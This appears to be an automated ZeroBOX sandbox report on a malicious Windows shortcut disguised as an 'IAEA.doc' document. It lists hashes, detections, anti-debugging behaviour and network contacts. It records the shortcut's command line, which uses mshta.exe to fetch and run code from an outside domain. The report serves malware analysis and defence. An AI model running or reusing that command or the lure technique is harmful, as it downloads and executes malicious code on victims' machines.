Summary | ZeroBOX

IAEA.doc.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category FILE
Machine s1_win7_x6401
Started Sept. 5, 2024, 8:31 a.m.
Completed Sept. 5, 2024, 8:33 a.m.
Size 2.1KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Mon Apr 17 03:06:41 2023, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hidenormalshowminimized
MD5 1d2b9a986461e97edfff9b91e64e1e5b
SHA256 c2bc69085df7036bdef980932a2383b34a9fb76a92d85b9f377beca060053c17
CRC32 70B278CF
ssdeep 24:8ALkQCvn//E8AZ68+xebf+/2gnTT4I0BXQaR3+POh6BOY+/vm:8Ckx/WI8+ebfUMIOXv3Fh6BOYk
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
pkinfo.live 103.231.75.189
IP Address Status Action
103.231.75.189 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API GlobalMemoryStatusEx
Status 1
Return 1
Repeated 0
API NtProtectVirtualMemory
Arguments
process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73352000
process_handle: 0xffffffff
Status 1
Return 0
Repeated 0
file C:\Users\test22\AppData\Local\Temp\IAEA.doc.lnk
cmdline "C:\Windows\System32\mshta.exe" https://pkinfo.live/config.php
Matched rules
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP
API RegSetValueExA
Arguments
key_handle: 0x000002c0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
Status 1
Return 0
Repeated 0
Cynet Malicious (score: 99)
CAT-QuickHeal LNK.APT.43736
Skyhigh BehavesLike.Trojan.xx
VIPRE Heur.BZC.YAX.Nioc.1.0A2B0023
Arcabit Heur.BZC.YAX.Nioc.1.0A2B0023
BitDefender Heur.BZC.YAX.Nioc.1.0A2B0023
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0A2B0023
Emsisoft Heur.BZC.YAX.Nioc.1.0A2B0023 (B)
F-Secure Malware.LNK/Dldr.Agent.VPUJ
FireEye Heur.BZC.YAX.Nioc.1.0A2B0023
Sophos Troj/DownLnk-X
SentinelOne Static AI - Suspicious LNK
Google Detected
Avira LNK/Dldr.Agent.VPUJ
MAX malware (ai score=83)
GData Heur.BZC.YAX.Nioc.1.0A2B0023
Zoner Probably Heur.LNKScript
Fortinet LNK/Agent.AHY!tr.dldr
Process injection Process 2560 resumed a thread in remote process 2672
API NtResumeThread
Arguments
thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
Status 1
Return 0
Repeated 0
dead_host 103.231.75.189:443